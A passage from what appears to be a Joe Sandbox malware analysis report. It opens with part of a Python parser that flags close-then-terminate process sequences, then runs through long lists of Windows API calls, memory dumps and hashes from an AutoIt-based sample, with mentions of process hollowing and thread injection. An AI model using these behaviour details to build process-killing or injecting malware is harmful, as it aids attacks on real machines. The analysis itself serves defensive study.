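                             int(m.group("ref"), 16), m.group("sub")))
    return calls


def describe(c: ApiCall) -> str:
    """Render one call with constants decoded. Joe Sandbox dumps more stack slots
    than the API has parameters, so only the documented positions are read."""
    a = c.args
    if c.api == "MapVirtualKeyW" and len(a) >= 2 and a[0] is not None:
        vk = VK_NAMES.get(a[0], f"VK_0x{a[0]:02X}")
        kind = "VK->scancode" if a[1] == MAPVK_VK_TO_VSC else f"maptype {a[1]}"
        return f"{c.api}({vk}, {kind})"
    if c.api in ("PostMessageW", "SendMessageTimeoutW") and len(a) >= 2:
        msg = "WM_CLOSE" if a[1] == WM_CLOSE else ("msg ?" if a[1] is None else f"msg 0x{a[1]:04X}")
        extra = ""
        if c.api == "SendMessageTimeoutW" and len(a) >= 6 \
                and isinstance(a[4], int) and isinstance(a[5], int):
            flags = "SMTO_ABORTIFHUNG" if a[4] & SMTO_ABORTIFHUNG else f"flags 0x{a[4]:X}"
            extra = f", {flags}, timeout {a[5]} ms"
        return f"{c.api}(hwnd, {msg}{extra})"
    if c.api == "OpenProcess" and a and a[0] is not None:
        acc = "PROCESS_ALL_ACCESS" if a[0] == PROCESS_ALL_ACCESS else f"access 0x{a[0]:X}"
        return f"OpenProcess({acc})"
    return c.api


def find_window_kill(calls: list[ApiCall]) -> Optional[list[int]]:
    """Return the call-site refs of a close-then-terminate sequence, or None.
    Order matters: WM_CLOSE to a window, owning PID looked up, process opened
    with PROCESS_ALL_ACCESS, then TerminateProcess."""
    stage, refs = 0, []
    for c in calls:
        a = c.args
        if stage == 0 and c.api in ("PostMessageW", "SendMessageTimeoutW") \
                and len(a) >= 2 and a[1] == WM_CLOSE:
            stage, refs = 1, [c.ref]
        elif stage == 1 and c.api == "GetWindowThreadProcessId":
            stage, refs = 2, refs + [c.ref]
        elif stage == 2 and c.api == "OpenProcess" and a and a[0] == PROCESS_ALL_ACCESS:
            stage, refs = 3, refs + [c.ref]
        elif stage == 3 and c.api == "TerminateProcess":
            return refs + [c.ref]
    return None


def find_modifier_scancode_init(calls: list[ApiCall]) -> bool:
    """True when Win, Shift, Ctrl and Alt are all mapped VK->scancode, i.e. the
    routine precomputes what a synthetic-keystroke sender needs for KEYBDINPUT."""
    vks = {c.args[0] for c in calls
           if c.api == "MapVirtualKeyW" and len(c.args) >= 2 and c.args[1] == MAPVK_VK_TO_VSC}
    return {0x5B, 0x10, 0x11, 0x12} <= vks


if __name__ == "__main__":
    for title, listing in (("window kill", WINKILL_LISTING), ("key mapping", KEYMAP_LISTING)):
        calls = parse_listing(listing)
        print(f"== {title}")
        for c in calls:
            print(f"  {c.ref:08X}  {describe(c)}")
        print("  window-kill refs:", [f"{r:08X}" for r in (find_window_kill(calls) or [])])
        print("  modifier scan-code init:", find_modifier_scancode_init(calls))
```

Two caveats when reading these listings. First, the argument lists are stack snapshots, not parameter lists: OpenProcess takes three parameters but the report shows sixteen values, and the trailing 00000010,00000000,00000000,00000002,000001F4 repeat the SendMessageTimeoutW arguments still sitting in the caller's frame, so only index by the documented parameter position. Second, the scan-code lookup is benign on its own; it matters here only alongside the report's other findings (process hollowing, thread injection, window kill), which is why the parser reports it as a fact rather than as a verdict.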
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00F09A33
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,00F35DEE,?,?,?,?,?,00ECED63), ref: 00F09A44
                                                                                                                                                                                                                                                      • TerminateThread.KERNEL32(?,000001F6,?,?,?,00F35DEE,?,?,?,?,?,00ECED63), ref: 00F09A51
                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00F35DEE,?,?,?,?,?,00ECED63), ref: 00F09A5E
                                                                                                                                                                                                                                                        • Part of subcall function 00F093D1: CloseHandle.KERNEL32(?,?,00F09A6B,?,?,?,00F35DEE,?,?,?,?,?,00ECED63), ref: 00F093DB
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F09A71
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,00F35DEE,?,?,?,?,?,00ECED63), ref: 00F09A78
                                                                                                                                                                                                                                                      Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
APIs
  • Part of subcall function 00EDF4EA: std::exception::exception.LIBCMT ref: 00EDF51E
  • Part of subcall function 00EDF4EA: __CxxThrowException@8.LIBCMT ref: 00EDF533
• __swprintf.LIBCMT ref: 00EC1EA6
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EC1D49
Similarity
• API ID: Exception@8Throw__swprintfstd::exception::exception
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 2125237772-557222456
APIs
• VariantInit.OLEAUT32(?), ref: 00F1B006
• CharUpperBuffW.USER32(?,?), ref: 00F1B115
• VariantClear.OLEAUT32(?), ref: 00F1B298
  • Part of subcall function 00F09DC5: VariantInit.OLEAUT32(00000000), ref: 00F09E05
  • Part of subcall function 00F09DC5: VariantCopy.OLEAUT32(?,?), ref: 00F09E0E
  • Part of subcall function 00F09DC5: VariantClear.OLEAUT32(?), ref: 00F09E1A
Strings
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
APIs
  • Part of subcall function 00EDC6F4: _wcscpy.LIBCMT ref: 00EDC717
• _memset.LIBCMT ref: 00F05438
• GetMenuItemInfoW.USER32(?), ref: 00F05467
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00F05513
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00F0553D
Strings
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0027B
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00F002B1
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00F002C2
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00F00344
Strings
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                                                                                                                                                      • String ID: DllGetClassObject
                                                                                                                                                                                                                                                      • API String ID: 753597075-1075368562
                                                                                                                                                                                                                                                      • Opcode ID: 4271b90073a4922d821b169202556c5110da0573aa1a524b44b3754a8c6c0815
                                                                                                                                                                                                                                                      • Instruction ID: 9ef1589512af029f7f6db86a20020869d95627fc1bc396df433e440416dc05a2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4271b90073a4922d821b169202556c5110da0573aa1a524b44b3754a8c6c0815
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6414D71A00204EFDB06CF54C885B9A7BB9EF45315F1480A9ED09DF286DBB5DA44FBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F05075
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32 ref: 00F05091
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00F050D7
                                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F81708,00000000), ref: 00F05120
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                                                                                                                                                      • Opcode ID: 02ddf6befc144f8e6a1b1d3d1db173e5e257a6c76572ae5dcc6b3be2dfe41dd8
                                                                                                                                                                                                                                                      • Instruction ID: 34d980f2e795afedc18f42212326430440e70c07e8b932d0362396b4bee35491
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02ddf6befc144f8e6a1b1d3d1db173e5e257a6c76572ae5dcc6b3be2dfe41dd8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C41AC712057019FD7209F24DC81B2BB7E8AF85B24F044A5EF965972D1D7B0A904EF62
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?,?,?), ref: 00F20587
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                      • API String ID: 2358735015-567219261
                                                                                                                                                                                                                                                      • Opcode ID: c2c0595b906831c1e381da40b06f985eb2687c434dee872265ea7dac13ec1069
                                                                                                                                                                                                                                                      • Instruction ID: 97cee265cbc2f5709b9e30cfa486f520e8377426a732c9f584095b4a85ad41b3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2c0595b906831c1e381da40b06f985eb2687c434dee872265ea7dac13ec1069
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F319031900216AFCF00EF54DD51AEEB7B4FF55314B10862AE826A77D2DB71A916DB80
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EFB88E
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EFB8A1
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EFB8D1
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                      • API String ID: 3850602802-1403004172
                                                                                                                                                                                                                                                      • Opcode ID: 6457dbadd825ade154076cbfd01025f224c42611153ee8f41f1ed2cada12d454
                                                                                                                                                                                                                                                      • Instruction ID: cd6a7562f0dcf5faeb39748432a7a04c46e0c4613a7d491c8c25a604033c83b4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6457dbadd825ade154076cbfd01025f224c42611153ee8f41f1ed2cada12d454
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16210475A00108AFD7089BA4C886DFE77B8DF86354B105129F525B61E1DB754D069620
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F14401
                                                                                                                                                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F14427
                                                                                                                                                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F14457
                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00F1449E
                                                                                                                                                                                                                                                        • Part of subcall function 00F15052: GetLastError.KERNEL32(?,?,00F143CC,00000000,00000000,00000001), ref: 00F15067
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1951874230-3916222277
                                                                                                                                                                                                                                                      • Opcode ID: ed1b72f5c33eacd91af820bff8c67b09f7abc79004ced6de6d585290c044228b
                                                                                                                                                                                                                                                      • Instruction ID: 5ebff10222224a516eddb067c95210fb43d2c7e71ebda55fdd95f8ea97d7814b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed1b72f5c33eacd91af820bff8c67b09f7abc79004ced6de6d585290c044228b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 932180B6500209BEE711DF95CC85FFB76ECEB89B58F10801AF905D2140DA64AD85A771
APIs
  • Part of subcall function 00EDD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EDD1BA
  • Part of subcall function 00EDD17C: GetStockObject.GDI32(00000011), ref: 00EDD1CE
  • Part of subcall function 00EDD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EDD1D8
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F2915C
• LoadLibraryW.KERNEL32(?), ref: 00F29163
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F29178
• DestroyWindow.USER32(?), ref: 00F29180
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
• String ID: SysAnimate32
• API String ID: 4146253029-1011021900
• Opcode ID: efedece149c71c8588314feb4b8d4bea62b909a36f691f97f8d202db1dad29fb
• Instruction ID: 8949aa07c2bd6b718e4243c174d4ee64fa6bbc4c3cb5aa4816d1598cfea7d479
• Opcode Fuzzy Hash: efedece149c71c8588314feb4b8d4bea62b909a36f691f97f8d202db1dad29fb
• Instruction Fuzzy Hash: 20218E7160821ABBEF104E65AC85EBA37ADFB99374F100619F95493190C7B1DC62B760
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00F09588
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F095B9
• GetStdHandle.KERNEL32(0000000C), ref: 00F095CB
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00F09605
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: 92d868a655af56209cf6b866c4b65108d930bfcbd46ecc9c4c881eee1cddbbe1
• Instruction ID: 181e3a3382bc56d36e3245b0ebdee05ae383ac9a33de41d3dfbf997e846191ac
• Opcode Fuzzy Hash: 92d868a655af56209cf6b866c4b65108d930bfcbd46ecc9c4c881eee1cddbbe1
• Instruction Fuzzy Hash: 06219275904209ABEB219F26DC05AAA77F8AF55720F244A19FCA1D72D1E7B0D940FB10
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00F09653
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F09683
• GetStdHandle.KERNEL32(000000F6), ref: 00F09694
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00F096CE
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: e009921b16d8e690a87549b054b40959e8110e4c40209127461b876b122c66b8
• Instruction ID: e61e318a1ac720236bf5afb935ebbe9581c2b6dbc9afe20fbb0e4ca6a214cce7
• Opcode Fuzzy Hash: e009921b16d8e690a87549b054b40959e8110e4c40209127461b876b122c66b8
• Instruction Fuzzy Hash: B5219075A04209ABDB209F699C04E9A77A8AF55734F200A19FCB1D32D1F7F29941FB10
APIs
• SetErrorMode.KERNEL32(00000001), ref: 00F0DB0A
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00F0DB5E
• __swprintf.LIBCMT ref: 00F0DB77
• SetErrorMode.KERNEL32(00000000,00000001,00000000,00F5DC00), ref: 00F0DBB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: c4c0f0bc515f9ce12cb24a3957b91b29fbbe3c5319a62a93efa9f48c6c5c186c
• Instruction ID: 959523f5957f5dd39cc0eb9a03552221ebd56285b260911916488d0220cbbc32
• Opcode Fuzzy Hash: c4c0f0bc515f9ce12cb24a3957b91b29fbbe3c5319a62a93efa9f48c6c5c186c
• Instruction Fuzzy Hash: E2216875600148AFCB10EF95CD85E9EBBF8EF89704B104069F909E7351DB71EA41EB61
APIs
  • Part of subcall function 00EFC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EFC84A
  • Part of subcall function 00EFC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EFC85D
  • Part of subcall function 00EFC82D: GetCurrentThreadId.KERNEL32 ref: 00EFC864
  • Part of subcall function 00EFC82D: AttachThreadInput.USER32(00000000), ref: 00EFC86B
• GetFocus.USER32 ref: 00EFCA05
  • Part of subcall function 00EFC876: GetParent.USER32(?), ref: 00EFC884
• GetClassNameW.USER32(?,?,00000100), ref: 00EFCA4E
• EnumChildWindows.USER32(?,00EFCAC4), ref: 00EFCA76
• __swprintf.LIBCMT ref: 00EFCA90
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
• String ID: %s%d
• API String ID: 3187004680-1110647743
• Opcode ID: 17ff5470b5061916b4e7cba68dcf58144130f2e5e031d90e37b7efc56e94b1ca
• Instruction ID: 34f48126ba2138ddfe1a0a010b51ed98818913243024e130e0fd14ba0e082df6
• Opcode Fuzzy Hash: 17ff5470b5061916b4e7cba68dcf58144130f2e5e031d90e37b7efc56e94b1ca
• Instruction Fuzzy Hash: 8711D27160020C6BDB05BF608D85FFE37A8AF44704F209066FF09BA182CB70A546DB71
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F219F3
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F21A26
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F21B49
• CloseHandle.KERNEL32(?), ref: 00F21BBF
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: a40c6aa5973733b9746c659877842237004f4dc8dcee76bfbfac5b1142de1cc4
• Instruction ID: dc94319189f6046c0b9081a9e4751cf460ae2a7b17dbcab066d94d234eb22642
• Opcode Fuzzy Hash: a40c6aa5973733b9746c659877842237004f4dc8dcee76bfbfac5b1142de1cc4
• Instruction Fuzzy Hash: AD81B174A00214ABDF109F64C886BAEBBF5FF58720F04845AF905BF382D7B5AD419B90
APIs
• VariantInit.OLEAUT32(?), ref: 00F01CB4
• VariantClear.OLEAUT32(00000013), ref: 00F01D26
• VariantClear.OLEAUT32(00000000), ref: 00F01D81
• VariantClear.OLEAUT32(?), ref: 00F01DF8
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F01E26
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
